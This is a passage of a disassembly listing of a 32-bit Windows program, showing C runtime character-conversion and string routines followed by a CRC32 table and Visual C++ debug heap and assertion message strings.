mov ax, [ebp+8]
loc_4312C1: ; CODE XREF: .text:00431217�j
; .text:00431254�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4312D0 proc near ; CODE XREF: sub_431000+11B�p
; sub_431000+13F�p ...
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and eax, 0FFFFh
cmp eax, 0FFFFh
jnz short loc_4312EC
mov ax, word ptr [ebp+arg_0]
jmp loc_431380
; ---------------------------------------------------------------------------
loc_4312EC: ; CODE XREF: sub_4312D0+11�j
cmp dword_492170, 0
jnz short loc_431326
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
cmp ecx, 41h
jl short loc_431320
mov edx, [ebp+arg_0]
and edx, 0FFFFh
cmp edx, 5Ah
jg short loc_431320
mov eax, [ebp+arg_0]
and eax, 0FFFFh
add eax, 20h
mov word ptr [ebp+arg_0], ax
loc_431320: ; CODE XREF: sub_4312D0+31�j
; sub_4312D0+3F�j
mov ax, word ptr [ebp+arg_0]
jmp short loc_431380
; ---------------------------------------------------------------------------
loc_431326: ; CODE XREF: sub_4312D0+23�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
cmp ecx, 100h
jge short loc_431350
push 1
mov dx, word ptr [ebp+arg_0]
push edx
call sub_4316E0
add esp, 8
test eax, eax
jnz short loc_431350
mov ax, word ptr [ebp+arg_0]
jmp short loc_431380
; ---------------------------------------------------------------------------
loc_431350: ; CODE XREF: sub_4312D0+65�j
; sub_4312D0+78�j
push 0
push 1
lea eax, [ebp+var_4]
push eax
push 1
lea ecx, [ebp+arg_0]
push ecx
push 100h
mov edx, dword_492170
push edx
call sub_431390
add esp, 1Ch
test eax, eax
jnz short loc_43137C
mov ax, word ptr [ebp+arg_0]
jmp short loc_431380
; ---------------------------------------------------------------------------
loc_43137C: ; CODE XREF: sub_4312D0+A4�j
mov ax, [ebp+var_4]
loc_431380: ; CODE XREF: sub_4312D0+17�j
; sub_4312D0+54�j ...
mov esp, ebp
pop ebp
retn
sub_4312D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431390 proc near ; CODE XREF: sub_4312D0+9A�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433D88
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_49240C, 0
jnz short loc_431416
push 0
push 0
push 1
push offset dword_43301C
push 100h
push 0
call ds:dword_494478
test eax, eax
jz short loc_4313E7
mov dword_49240C, 1
jmp short loc_431416
; ---------------------------------------------------------------------------
loc_4313E7: ; CODE XREF: sub_431390+49�j
push 0
push 0
push 1
push offset dword_433018
push 100h
push 0
call ds:dword_494474
test eax, eax
jz short loc_43140F
mov dword_49240C, 2
jmp short loc_431416
; ---------------------------------------------------------------------------
loc_43140F: ; CODE XREF: sub_431390+71�j
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_431416: ; CODE XREF: sub_431390+2D�j
; sub_431390+55�j ...
cmp [ebp+arg_C], 0
jle short loc_43142F
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
call sub_431680
add esp, 8
mov [ebp+arg_C], eax
loc_43142F: ; CODE XREF: sub_431390+8A�j
cmp dword_49240C, 1
jnz short loc_43145B
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_494478
jmp loc_431663
; ---------------------------------------------------------------------------
loc_43145B: ; CODE XREF: sub_431390+A6�j
cmp dword_49240C, 2
jnz loc_431661
cmp [ebp+arg_18], 0
jnz short loc_431477
mov edx, dword_492180
mov [ebp+arg_18], edx
loc_431477: ; CODE XREF: sub_431390+DC�j
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 220h
mov edx, [ebp+arg_18]
push edx
call ds:dword_4943B0
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4314A6
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_4314A6: ; CODE XREF: sub_431390+10D�j
mov [ebp+var_4], 0
mov eax, [ebp+var_20]
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_30], esp
mov [ebp+var_18], esp
mov eax, [ebp+var_30]
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_4314E6
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_4314E6: ; CODE XREF: sub_431390+13D�j
cmp [ebp+var_1C], 0
jnz short loc_4314F3
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_4314F3: ; CODE XREF: sub_431390+15A�j
push 0
push 0
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 220h
mov edx, [ebp+arg_18]
push edx
call ds:dword_4943B0
test eax, eax
jnz short loc_431521
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_431521: ; CODE XREF: sub_431390+188�j
push 0
push 0
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_494474
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_43154B
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_43154B: ; CODE XREF: sub_431390+1B2�j
mov [ebp+var_4], 1
mov eax, [ebp+var_2C]
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_34], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_34]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_43158B
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_43158B: ; CODE XREF: sub_431390+1E2�j
cmp [ebp+var_24], 0
jnz short loc_431598
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_431598: ; CODE XREF: sub_431390+1FF�j
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_494474
test eax, eax
jnz short loc_4315C1
xor eax, eax
jmp loc_431663
; ---------------------------------------------------------------------------
loc_4315C1: ; CODE XREF: sub_431390+228�j
mov edx, [ebp+arg_4]
and edx, 400h
test edx, edx
jz short loc_431606
mov eax, [ebp+var_2C]
mov [ebp+var_28], eax
cmp [ebp+arg_14], 0
jz short loc_431604
mov ecx, [ebp+arg_14]
cmp ecx, [ebp+var_2C]
jge short loc_4315EA
mov edx, [ebp+arg_14]
mov [ebp+var_38], edx
jmp short loc_4315F0
; ---------------------------------------------------------------------------
loc_4315EA: ; CODE XREF: sub_431390+250�j
mov eax, [ebp+var_2C]
mov [ebp+var_38], eax
loc_4315F0: ; CODE XREF: sub_431390+258�j
mov ecx, [ebp+var_38]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_10]
push eax
call sub_4191A0
add esp, 0Ch
loc_431604: ; CODE XREF: sub_431390+248�j
jmp short loc_43165C
; ---------------------------------------------------------------------------
loc_431606: ; CODE XREF: sub_431390+23C�j
cmp [ebp+arg_14], 0
jnz short loc_431633
push 0
push 0
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_24]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_431631
xor eax, eax
jmp short loc_431663
; ---------------------------------------------------------------------------
loc_431631: ; CODE XREF: sub_431390+29B�j
jmp short loc_43165C
; ---------------------------------------------------------------------------
loc_431633: ; CODE XREF: sub_431390+27A�j
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_24]
push ecx
push 1
mov edx, [ebp+arg_18]
push edx
call ds:dword_4942D4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_43165C
xor eax, eax
jmp short loc_431663
; ---------------------------------------------------------------------------
loc_43165C: ; CODE XREF: sub_431390:loc_431604�j
; sub_431390:loc_431631�j ...
mov eax, [ebp+var_28]
jmp short loc_431663
; ---------------------------------------------------------------------------
loc_431661: ; CODE XREF: sub_431390+D2�j
xor eax, eax
loc_431663: ; CODE XREF: sub_431390+81�j
; sub_431390+C6�j ...
lea esp, [ebp-44h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_431390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431680 proc near ; CODE XREF: sub_431390+94�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
loc_431692: ; CODE XREF: sub_431680+37�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
test edx, edx
jz short loc_4316B9
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
test edx, edx
jz short loc_4316B9
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
jmp short loc_431692
; ---------------------------------------------------------------------------
loc_4316B9: ; CODE XREF: sub_431680+20�j
; sub_431680+2C�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
test edx, edx
jnz short loc_4316CF
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
sar eax, 1
jmp short loc_4316D2
; ---------------------------------------------------------------------------
loc_4316CF: ; CODE XREF: sub_431680+43�j
mov eax, [ebp+arg_4]
loc_4316D2: ; CODE XREF: sub_431680+4D�j
mov esp, ebp
pop ebp
retn
sub_431680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4316E0 proc near ; CODE XREF: sub_4312D0+6E�p
; .text:0043176D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and eax, 0FFFFh
cmp eax, 0FFFFh
jnz short loc_4316F7
xor eax, eax
jmp short loc_431753
; ---------------------------------------------------------------------------
loc_4316F7: ; CODE XREF: sub_4316E0+11�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
cmp ecx, 100h
jge short loc_431720
mov edx, [ebp+arg_0]
and edx, 0FFFFh
mov eax, off_442D50
mov cx, [eax+edx*2]
mov word ptr [ebp+var_4], cx
jmp short loc_431740
; ---------------------------------------------------------------------------
loc_431720: ; CODE XREF: sub_4316E0+26�j
push 0
push 0
lea edx, [ebp+var_4]
push edx
push 1
lea eax, [ebp+arg_0]
push eax
push 1
call sub_42F2F0
add esp, 18h
test eax, eax
jnz short loc_431740
xor eax, eax
jmp short loc_431753
; ---------------------------------------------------------------------------
loc_431740: ; CODE XREF: sub_4316E0+3E�j
; sub_4316E0+5A�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
mov ecx, [ebp+arg_4]
and ecx, 0FFFFh
and eax, ecx
loc_431753: ; CODE XREF: sub_4316E0+15�j
; sub_4316E0+5E�j
mov esp, ebp
pop ebp
retn
sub_4316E0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov ax, [ebp+0Ch]
push eax
mov cx, [ebp+8]
push ecx
call sub_4316E0
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 1000h
_text ends
; Section 2. (virtual address 00032000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00032000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 432000h
dd 0
dd 46FDCBFDh, 0
dd 2, 4Bh, 0
dd 47C00h
dword_43201C dd 0 ; DATA XREF: sub_40416F+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dd 0
dbl_432420 dq 9.765625e-4 ; DATA XREF: sub_405084+2BD�r
; sub_405084+2D8�r ...
aClient db 'Client',0 ; DATA XREF: .data:00442C20�o
align 10h
aIgnore db 'Ignore',0 ; DATA XREF: .data:00442C1C�o
align 4
aCrt db 'CRT',0 ; DATA XREF: .data:00442C18�o
aNormal_0 db 'Normal',0 ; DATA XREF: .data:00442C14�o
align 4
aFree db 'Free',0 ; DATA XREF: .data:off_442C10�o
align 4
aErrorMemoryAll db 'Error: memory allocation: bad memory block type.',0Ah,0
; DATA XREF: sub_416B00:loc_416C6A�o
; sub_416F00:loc_417080�o
align 10h
aInvalidAllocat db 'Invalid allocation size: %u bytes.',0Ah,0 ; DATA XREF: sub_416B00+11B�o
aS_34 db '%s',0 ; DATA XREF: sub_416B00+BC�o
; sub_416B00+16F�o ...
align 4
aClientHookAl_0 db 'Client hook allocation failure.',0Ah,0
; DATA XREF: sub_416B00:loc_416BB7�o
align 4
aClientHookAllo db 'Client hook allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: sub_416B00+94�o
align 4
aDbgheap_c db 'dbgheap.c',0 ; DATA XREF: sub_416B00+31�o
; sub_416F00+77�o ...
align 10h
a_crtcheckmemor db '_CrtCheckMemory()',0 ; DATA XREF: sub_416B00+25�o
; sub_416F00+6B�o ...
align 4
a_pfirstblockPo db '_pFirstBlock == pOldBlock',0 ; DATA XREF: sub_416F00+499�o
align 10h
a_plastblockPol db '_pLastBlock == pOldBlock',0 ; DATA XREF: sub_416F00+445�o
align 4
aFreallocFreall db 'fRealloc || (!fRealloc && pNewBlock == pOldBlock)',0
; DATA XREF: sub_416F00:loc_4172E6�o
align 10h
a_block_typePol db '_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)',0
; DATA XREF: sub_416F00+277�o
align 4
aPoldblockNline db 'pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_'
; DATA XREF: sub_416F00:loc_417111�o
db 'REQ',0
align 4
a_crtisvalidhea db '_CrtIsValidHeapPointer(pUserData)',0 ; DATA XREF: sub_416F00+1B6�o
; sub_4174F0+A8�o ...
align 4
aAllocationTooL db 'Allocation too large or negative: %u bytes.',0Ah,0
; DATA XREF: sub_416F00+136�o
align 4
aClientHookRe_0 db 'Client hook re-allocation failure.',0Ah,0
; DATA XREF: sub_416F00:loc_416FFF�o
aClientHookReAl db 'Client hook re-allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: sub_416F00+DC�o
a_pfirstblockPh db '_pFirstBlock == pHead',0 ; DATA XREF: sub_4174F0+35D�o
align 4
a_plastblockPhe db '_pLastBlock == pHead',0 ; DATA XREF: sub_4174F0+307�o
align 4
aPheadNblockuse db 'pHead->nBlockUse == nBlockUse',0 ; DATA XREF: sub_4174F0+29C�o
; sub_417900+112�o
align 4
aPheadNlineIgno db 'pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ',0
; DATA XREF: sub_4174F0:loc_417714�o
align 4
aDamageAfterHsB db 'DAMAGE: after %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_4174F0+1E5�o
; sub_417BD0+249�o
align 10h
aDamageBeforeHs db 'DAMAGE: before %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_4174F0+17F�o
; sub_417BD0+1EC�o
align 4
a_block_type_is db '_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)',0 ; DATA XREF: sub_4174F0+10A�o
; sub_417900+C1�o ...
align 4
aClientHookFree db 'Client hook free failure.',0Ah,0 ; DATA XREF: sub_4174F0:loc_41755D�o
align 10h
aMemoryCheckErr db 'memory check error at 0x%08X = 0x%02X, should be 0x%02X.',0Ah,0
; DATA XREF: sub_417B40+54�o
align 4
aHsLocatedAt0x0 db '%hs located at 0x%08X is %u bytes long.',0Ah,0
; DATA XREF: sub_417BD0+31E�o
align 4
aHsAllocatedAtF db '%hs allocated at file %hs(%d).',0Ah,0 ; DATA XREF: sub_417BD0+2EB�o
aDamageOnTopOfF db 'DAMAGE: on top of Free block at 0x%08X.',0Ah,0
; DATA XREF: sub_417BD0+2A2�o
align 4
aDamaged db 'DAMAGED',0 ; DATA XREF: sub_417BD0:loc_417D88�o
a_heapchkFail_3 db '_heapchk fails with unknown return value!',0Ah,0
; DATA XREF: sub_417BD0:loc_417CE2�o
align 4
a_heapchkFail_2 db '_heapchk fails with _HEAPBADPTR.',0Ah,0
; DATA XREF: sub_417BD0:loc_417CBA�o
align 4
a_heapchkFail_1 db '_heapchk fails with _HEAPBADEND.',0Ah,0
; DATA XREF: sub_417BD0:loc_417C92�o
align 10h
a_heapchkFail_0 db '_heapchk fails with _HEAPBADNODE.',0Ah,0
; DATA XREF: sub_417BD0:loc_417C6A�o
align 4
a_heapchkFailsW db '_heapchk fails with _HEAPBADBEGIN.',0Ah,0
; DATA XREF: sub_417BD0:loc_417C3F�o
aBadMemoryBlock db 'Bad memory block found at 0x%08X.',0Ah,0 ; DATA XREF: sub_4181D0+11B�o
align 4
a_crtmemcheckpo db '_CrtMemCheckPoint: NULL state pointer.',0Ah,0
; DATA XREF: sub_4181D0:loc_4181DF�o
a_crtmemdiffere db '_CrtMemDifference: NULL state pointer.',0Ah,0
; DATA XREF: .text:loc_418362�o
aObjectDumpComp db 'Object dump complete.',0Ah,0 ; DATA XREF: sub_418470:loc_4186FC�o
align 4
aCrtBlockAt0x08 db 'crt block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: sub_418470+250�o
align 4
aNormalBlockAt0 db 'normal block at 0x%08X, %u bytes long.',0Ah,0
; DATA XREF: sub_418470+1F3�o
aClientBlockAt0 db 'client block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: sub_418470+188�o
aLd db '{%ld} ',0 ; DATA XREF: sub_418470+139�o
align 4
aHsD db '%hs(%d) : ',0 ; DATA XREF: sub_418470+111�o
align 4
aFileErrorD db '#File Error#(%d) : ',0 ; DATA XREF: sub_418470+E0�o
aDumpingObjects db 'Dumping objects ->',0Ah,0 ; DATA XREF: sub_418470:loc_41848A�o
aDataSS db ' Data: <%s> %s',0Ah,0 ; DATA XREF: sub_418730+EC�o
a_2x db '%.2X ',0 ; DATA XREF: sub_418730+BF�o
align 4
aDetectedMemory db 'Detected memory leaks!',0Ah,0 ; DATA XREF: sub_418850:loc_418884�o
aTotalAllocatio db 'Total allocations: %ld bytes.',0Ah,0 ; DATA XREF: .text:0041896D�o
align 10h
aLargestNumberU db 'Largest number used: %ld bytes.',0Ah,0 ; DATA XREF: .text:00418945�o
align 4
aLdBytesInLdHsB db '%ld bytes in %ld %hs Blocks.',0Ah,0 ; DATA XREF: .text:0041891B�o
align 4
aFormatNull db 'format != NULL',0 ; DATA XREF: sub_418D70+45�o
; sub_418EF0+45�o ...
align 4
aSprintf_c db 'sprintf.c',0 ; DATA XREF: sub_418D70+24�o
; sub_418D70+4E�o ...
align 10h
aStringNull db 'string != NULL',0 ; DATA XREF: sub_418D70+1B�o
; sub_418EF0+1B�o ...
align 10h
aSscanf_c db 'sscanf.c',0 ; DATA XREF: sub_4192A0+24�o
; sub_4192A0+4E�o
align 4
aVsprintf_c db 'vsprintf.c',0 ; DATA XREF: sub_4193F0+1E�o
; sub_4193F0+48�o
align 4
aFclose_c db 'fclose.c',0 ; DATA XREF: sub_419740+1D�o
; sub_4197D0+25�o
align 4
aStreamNull db 'stream != NULL',0 ; DATA XREF: sub_419740+14�o
; sub_41B7D0+D�o ...
align 4
aStrNull db 'str != NULL',0 ; DATA XREF: sub_4197D0+1C�o
; sub_419B30+45�o ...
aFgets_c db 'fgets.c',0 ; DATA XREF: sub_419B30+24�o
; sub_419B30+4E�o
aMode_t0 db '*mode != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_419C70+95�o
align 4
aModeNull db 'mode != NULL',0 ; DATA XREF: sub_419C70+67�o
; sub_421980+4F�o
align 4
aFile_t0 db '*file != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_419C70+3D�o
align 10h
aFopen_c db 'fopen.c',0 ; DATA XREF: sub_419C70+18�o
; sub_419C70+46�o ...
aFileNull db 'file != NULL',0 ; DATA XREF: sub_419C70+F�o
align 4
aStrupr_c db 'strupr.c',0 ; DATA XREF: sub_41A5E0+133�o
align 4
aFprintf_c db 'fprintf.c',0 ; DATA XREF: sub_41AD60+1E�o
; sub_41AD60+48�o
align 10h
aMbstowcs_c db 'mbstowcs.c',0 ; DATA XREF: sub_41B0E0+32�o
align 4
aSNull db 's != NULL',0 ; DATA XREF: sub_41B0E0+29�o
align 4
aFseek_c db 'fseek.c',0 ; DATA XREF: sub_41B7D0+16�o
; sub_41B840+19�o
dword_432C50 dd 0FFFFFFFFh, 41BAA2h, 41BABDh ; DATA XREF: sub_41B970+5�o
aMlock_c db 'mlock.c',0 ; DATA XREF: sub_41BC90+16�o
aAssertionFai_1 db 'Assertion Failed',0 ; DATA XREF: .data:00442D40�o
align 4
aError db 'Error',0 ; DATA XREF: .data:00442D3C�o
align 10h
aWarning db 'Warning',0 ; DATA XREF: .data:off_442D38�o
aSDS_0 db '%s(%d) : %s',0 ; DATA XREF: sub_41BF80+1FF�o
asc_432C94: ; DATA XREF: sub_41BF80:loc_41C156�o
dw 0Ah
unicode 0, <>,0
asc_432C98: ; DATA XREF: sub_41BF80+1C2�o
dw 0Dh
unicode 0, <>,0
aAssertionFai_0 db 'Assertion failed!',0 ; DATA XREF: sub_41BF80:loc_41C0F5�o
align 10h
aAssertionFaile db 'Assertion failed: ',0 ; DATA XREF: sub_41BF80+169�o
align 4
a_crtdbgreportS db '_CrtDbgReport: String too long or IO Error',0
; DATA XREF: sub_41BF80+149�o
; sub_41BF80+21C�o ...
align 10h
aSecondChanceAs db 'Second Chance Assertion Failed: File %s, Line %d',0Ah,0
; DATA XREF: sub_41BF80+E6�o
align 4
aWsprintfa db 'wsprintfA',0 ; DATA XREF: sub_41BF80+B6�o
align 10h
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: sub_41BF80+9C�o
; sub_426B40+16�o
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Debug Library',0 ; DATA XREF: sub_41C310+2C2�o
align 10h
aDebugSProgramS db 'Debug %s!',0Ah ; DATA XREF: sub_41C310+28C�o
db 0Ah
db 'Program: %s%s%s%s%s%s%s%s%s%s%s',0Ah
db 0Ah
db '(Press Retry to debug the application)',0
align 4
aModule db 0Ah ; DATA XREF: sub_41C310+221�o
db 'Module: ',0
align 10h
aFile_3 db 0Ah ; DATA XREF: sub_41C310+1E1�o
db 'File: ',0
aLine db 0Ah ; DATA XREF: sub_41C310+1AA�o
db 'Line: ',0
asc_432DD0 db 0Ah ; DATA XREF: sub_41C310+173�o
; sub_4260B0+171�o
db 0Ah,0
align 4
aExpression db 'Expression: ',0 ; DATA XREF: sub_41C310+153�o
align 4
dword_432DE4 dd 0 ; DATA XREF: sub_41C310:loc_41C42A�o
; sub_41C310:loc_41C449�o ...
aForInformation db 0Ah ; DATA XREF: sub_41C310+10E�o
db 0Ah
db 'For information on how your program can cause an assertion',0Ah
db 'failure, see the Visual C++ documentation on asserts.',0
align 4
